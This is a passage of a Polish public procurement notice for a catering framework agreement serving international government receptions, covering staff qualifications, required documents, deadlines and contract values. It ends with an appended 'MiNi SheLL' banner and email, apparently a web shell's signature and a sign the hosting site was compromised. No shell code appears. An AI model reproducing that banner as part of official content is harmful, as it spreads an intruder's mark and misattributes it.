przed upływem terminu składania ofert – a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej dwóch zamówień (na podstawie jednej lub dwóch umów, przy czym pod pojęciem umowy należy rozumieć każde zamówienie) w zakresie usług restauracyjnych lub cateringowych o charakterze przyjęć koktajlowych, świadczonych w ramach spotkań rządowych lub państwowych o charakterze międzynarodowym, w których w każdym niezależnie uczestniczyło minimum 100 uczestników, w tym co przynajmniej jedna z wymienionych osób: Prezydenci lub Głowy Państw lub Prezesi Rady Ministrów lub Ministrowie Spraw Zagranicznych lub Ambasadorzy lub Dyplomaci lub Marszałkowie lub Wicemarszałkowie Sejmu lub Senatu lub Przewodniczący lub Wiceprzewodniczący Parlamentów Państwowych.<br/>Każde z zamówień musiało obejmować jednocześnie:<br/>-przygotowanie przystawek o charakterze finger food z produktów Wykonawcy;<br/>-serwis (odpowiednie przygotowanie stołów tj. nakrycia, dekoracji, zastawy stołowej i szkła);<br/>-obsługę kelnerską i kucharską.<br/>Łączna wartość dwóch zamówień musiała wynosić co najmniej 20 000 zł brutto.<br/>Zamawiający nie wymaga, aby zamówienie musiało być zrealizowane w obiekcie Wykonawcy.<br/>Zamawiający nie dopuszcza możliwości powoływania się na realizację zamówień dotyczących spotkań w których uczestniczyły osoby niepełniące oficjalnych funkcji w chwili spotkania (np. byli ministrowie lub wiceministrowie lub byli premierzy itd. jak i na usługi o charakterze przyjęć nieoficjalnych np. uroczystości rodzinne).<br/>C.Na potwierdzenie spełnienia niniejszego warunku, Wykonawcy winni udokumentować posiadanie osób zdolnych do wykonania zamówienia poprzez wykazanie, że osoby uczestniczące w wykonaniu zamówienia posiadają odpowiednie kwalifikacje oraz doświadczenie do wykonania zamówienia tj. dysponują:<br/>W zakresie części I:<br/>i. szefem kuchni zatrudnionym przez Wykonawcę na podstawie umowy o pracę, bądź współpracującym z Wykonawcą w innej formie (np. umowa cywilno-prawna), który:<br/>-nadzorował przynajmniej jedną usługę, o której mowa w Rozdziale V ust. 2 pkt 4) lit. A (cz. I) SWZ;<br/>-posiada co najmniej 3-letnie doświadczenie w nadzorze kuchni (w zakresie: opracowania menu, wyboru produktów i składników, sposobu przygotowania i podania każdego dania i nadzoru nad zespołem przygotowującym potrawy, rozdysponowania od kuchni do wydania obsłudze kelnerskiej potraw);<br/>-swobodnie porozumiewa się w języku polskim;<br/>-posiada obywatelstwo polskie;<br/>-jest niekarany;<br/>ii. minimum 10 kelnerami posiadającymi doświadczenie w realizacji minimum dwóch usług polegających na obsłudze kelnerskiej spotkania, o którym mowa w Rozdziale V ust. 2 pkt 4) lit. A (cz. I) SWZ. Każda obsługa kelnerska musiała obejmować podawanie bezpośrednie posiłków do stołu podczas spotkań. Wszystkie ww. osoby powinny mieć obywatelstwo polskie, być niekarane i swobodnie porozumiewać się w języku polskim. Ponadto minimum 4 kelnerów musi spełniać warunek porozumiewania się w języku angielskim na poziomie co najmniej komunikatywnym;<br/>iii. menadżerem posiadającym doświadczenie w organizacji co najmniej dwóch spotkań, o których mowa w warunku określonym w Rozdziale V ust. 2 pkt 4) lit. A (cz. I) SWZ. Każda organizacja spotkania musiała obejmować bezpośredni nadzór nad przygotowaniem sali tj. m.in.: nakrywanie stołów, nadzór nad organizacją pracy personelu kucharskiego, personelu pomocniczego oraz kelnerskiego, nadzór nad rozdawaniem posiłków przez kelnerów dla wszystkich osób uczestniczących w spotkaniu. Ponadto wskazana osoba powinna posiadać obywatelstwo polskie, porozumiewać się swobodnie w języku polskim i w języku angielskim co najmniej na poziomie komunikatywnym oraz być niekarana. <br/>W zakresie części II:<br/>i. szefem kuchni zatrudnionym przez Wykonawcę, bądź współpracującym z Wykonawcą w innej formie (np. umowa cywilno-prawna), który:<br/>-nadzorował przynajmniej jedną usługę, o której mowa w Rozdziale V ust. 2 pkt 4) lit. B (cz.II) SWZ:<br/>-posiada co najmniej 3-letnie doświadczenie w nadzorze kuchni (w zakresie: opracowania menu, wyboru produktów i składników, sposobu przygotowania i podania każdego dania i nadzoru nad zespołem przygotowującym potrawy, rozdysponowania od kuchni do wydania obsłudze kelnerskiej potraw);<br/>-swobodnie porozumiewa się w języku polskim;<br/>-posiada obywatelstwo polskie;<br/>-jest niekarany;<br/>ii. minimum 10 kelnerami - posiadającymi doświadczenie w realizacji minimum dwóch usług polegających na obsłudze kelnerskiej spotkania, o którym mowa w Rozdziale V ust. 2 pkt 4) lit. B (cz. II), podczas której wskazana osoba bezpośrednio podawała pozycje z menu. Wszystkie ww. osoby powinny mieć obywatelstwo polskie oraz być niekarane i swobodnie porozumiewać się w języku polskim. Ponadto, minimum 4 kelnerów musi spełniać warunek swobodnego porozumiewania się w języku angielskim, co najmniej na poziomie komunikatywnym;<br/>iii.	menadżerem, posiadającym doświadczenie w organizacji co najmniej dwóch spotkań, o których mowa w warunku określonym w Rozdziale V ust. 2 pkt 4) lit. B (cz. II) SWZ. Każda organizacja spotkania musiała obejmować bezpośredni nadzór nad przygotowaniem sali tj. m.in.: nakrywanie stołów, nadzór nad organizacją pracy personelu kucharskiego, personelu pomocniczego oraz kelnerskiego, nadzór nad rozdawaniem posiłków przez kelnerów dla wszystkich osób uczestniczących w spotkaniu. Ponadto wskazana osoba powinna posiadać obywatelstwo polskie, porozumiewać się swobodnie w języku polskim i w języku angielskim co najmniej na poziomie komunikatywnym oraz być niekarana. <br/>D.Tylko części I: <br/>Na potwierdzenie spełnienia tego warunku, Zamawiający żąda od Wykonawcy wykazania się dysponowaniem odpowiednim lokalem – restauracją (z możliwością produkcji gastronomicznej – pełne zaplecze kuchenne) na terenie m.st. Warszawy w dzielnicy: Śródmieście lub Mokotów lub Wola lub Ochota lub Żoliborz, który wskaże w wykazie, którego wzór stanowi zał. nr 8 do SWZ. <br/><br/>Szczegółowe informacje znajdują się w Rozdziale V SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1)	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - Załącznik nr 5 do SWZ;<br/>2)	informacji z Krajowego Rejestru Karnego w zakresie dotyczącym podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt 1), 2) i 4) ustawy Pzp, sporządzona nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>3)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1) ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>4)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1) ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>5)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) ustawy Pzp oraz art. 7 ust. 1 pkt 1) – 3) ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 1497, z późn. zm.), sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji (chyba że Wykonawca wskaże, że Zamawiający posiada te dokumenty – odpisy lub informacje itp. dotyczące tego Wykonawcy lub Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnie dostępnych baz danych, w szczególności rejestrów publicznych). W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o zawarcie umowy ramowej, dokument ten składa każdy z Wykonawców oddzielnie; <br/>6)	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art. 108 ust. 1 pkt 3), 4), 6) ustawy Pzp oraz w art. 109 ust. 1 pkt 1), 7), 8) oraz 10) ustawy Pzp wg Załącznika nr 12 do SWZ.<br/><br/>Szczegółowe informacje znajdują się w Rozdziale VII SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1)	decyzji w sprawie zatwierdzenia zakładu lub zaświadczenia o wpisie do rejestru zakładów, o których mowa w art. 62 ust. 1 pkt 2 lub 4 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2023 r. poz. 1448);<br/>2)	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 7 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, liczby uczestników obejmującej usługę, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy (wykaz usług stanowi Załącznik nr 6 do SWZ). Okresy wyrażone w latach lub miesiącach, o których mowa w tym punkcie, liczy się wstecz od dnia, w którym upływa termin składania ofert;<br/>3)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wykaz osób stanowi Załącznik nr 7 do SWZ;<br/>4)	wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami – wykaz potwierdzający dysponowanie lokalem w zakresie części I przedmiotowego zamówienia (Załącznik nr 8 do SWZ).<br/><br/>Szczegółowe informacje znajdują się w Rozdziale VII SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Oferta musi zawierać wypełniony formularz oferty sporządzony z wykorzystaniem Załącznika nr 1a lub Załącznika nr 1b do SWZ, w zależności od tego, na którą część składana jest oferta, zawierających wszystkie wskazane w nich informacje i oświadczenia.<br/>2.	Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1)	oświadczenie dotyczące spełniania warunków udziału w postępowaniu oraz przesłanek wykluczenia z postępowania stanowiące Załącznik nr 2 do SWZ, o którym mowa w Rozdziale VII ust. 1 SWZ;<br/>2)	zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy realizacji umowy ramowej, jeżeli Wykonawca polega na zdolnościach lub sytuacjach innych podmiotów na zasadach określonych w art. 118 ustawy Pzp – Załącznik nr 4 do SWZ oraz oświadczenie potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby, zgodnie z Załącznikiem nr 3 do SWZ (jeżeli dotyczy);<br/>3)	dokumenty, z których wynika prawo do podpisania oferty; tj. odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej, odpowiednie pełnomocnictwa (jeżeli dotyczy);<br/>4)	pełnomocnictwo / pełnomocnictwa dla osoby / osób podpisujących ofertę, jeżeli oferta jest podpisana przez pełnomocnika, (jeżeli dotyczy);<br/>5)	w przypadku Wykonawców wspólnie ubiegających się o zawarcie umowy ramowej oświadczenie zgodne z art. 117 ust. 4 ustawy Pzp (wzór oświadczenia stanowi Załącznik nr 11 do SWZ), w którym wskazują, które dostawy wykonają poszczególni Wykonawcy oraz pełnomocnictwo, w przypadku ustanowienia pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o zawarcie umowy ramowej.<br/><br/>Szczegółowe informacje znajdują się w SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy ubiegający się wspólnie o zawarcie umowy ramowej (np. spółki cywilne, konsorcja), zgodnie z art. 58 ust. 2 ustawy Pzp, zobowiązani są ustanowić pełnomocnika. Z treści pełnomocnictwa winno jednoznacznie wynikać prawo pełnomocnika do reprezentowania Wykonawcy w postępowaniu o zawarcie umowy ramowej albo do reprezentowania w postępowaniu i zawarcia umowy ramowej w imieniu Wykonawcy. Dokument ten winien być podpisany przez osobę/osoby uprawnioną(-e) do jego udzielenia, tj. zgodnie z formą reprezentacji każdego z Wykonawców (podpisany kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym). W przypadku wspólników spółki cywilnej dopuszczalne jest przedłożenie umowy spółki cywilnej, z której wynika zakres i sposób reprezentacji, a w przypadku konsorcjum przedłożenie umowy konsorcjum.<br/>2.	Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez pełnomocnika.<br/>3.	W przypadku Wykonawców wspólnie ubiegających się o zawarcie umowy ramowej, oświadczenie, <br/>o którym mowa w Rozdziale VII ust. 1 SWZ, składa każdy z Wykonawców wspólnie ubiegających się <br/>o zamówienie. Oświadczenie to wstępnie potwierdza brak podstaw do wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania, w tym oświadczenie dotyczące przynależności lub braku przynależności do tej samej grupy kapitałowej, składa każdy z Wykonawców wspólnie ubiegających się o zawarcie umowy ramowej.<br/>5.	Wykonawcy wspólnie ubiegający się o zawarcie umowy ramowej wskazują w oświadczeniu zgodnym z art. 117 ust. 4 ustawy Pzp (Załącznik nr 11 do SWZ), które usługi wykonają poszczególni Wykonawcy. Oświadczenie powinno zostać złożone wraz z ofertą.<br/>6.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających się o zawarcie umowy ramowej kluczowych zadań zamówienia dotyczących:<br/>1) zamówień na roboty budowlane lub usługi;<br/>2) prac związanych z rozmieszczeniem i instalacją, w ramach zamówienia na dostawy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy ramowej w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454 - 455 ustawy Pzp oraz wskazanym w projektowanych postanowieniach umowy ramowej, stanowiących Załącznik nr 10a i 10b do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-10 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem Platformy Zakupowej pod adresem: https://zamowienia-cokprp.ezamawiajacy.pl/pn/zamowienia-cokprp/demand/215969/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-10 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.19.) Umowa ramowa: </h3> Umowa ramowa zawarta zostanie z kilkoma wykonawcami <h3 class="mb-0">8.20.) Przewiduje się ograniczenie liczby uczestników umowy ramowej: <span class="normal">Nie</span></h3> <h3 class="mb-0">8.22.) Zamawiający udziela zamówień na podstawie art. 314 ust. 1 pkt 1, 2 albo 3 ustawy: <span class="normal">Zamawiający udziela zamówień na podstawie art. 314 ust. 1 pkt 3 ustawy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zgodnie z art. 310 pkt 1) ustawy Pzp, Zamawiający przewiduje możliwość unieważnienia przedmiotowego postępowania, jeżeli środki, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane<br/><br/>Zamawiający zawrze umowę ramową tylko z tymi Wykonawcami, którzy uzyskali minimum 40 punktów w zakresie kryterium nr 2 – Jakość, walory smakowe i estetyczne potraw, atrakcyjność podania. Oferta, która nie otrzyma wymaganej liczby punktów w zakresie kryterium nr 2, zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5) ustawy Pzp, jako niezgodna z warunkami zamówienia.<br/><br/>Wartością Umowy ramowej będzie kwota przeznaczona na sfinansowanie zamówienia w wysokości:<br/>a)	526 264,00 zł netto + VAT tj. brutto 585 544,92 zł - w zakresie części I;<br/>b)	721 280,00 zł netto + VAT tj. brutto 799 910,40 zł - w zakresie części II.

Creat By MiNi SheLL
Email: jattceo@gmail.com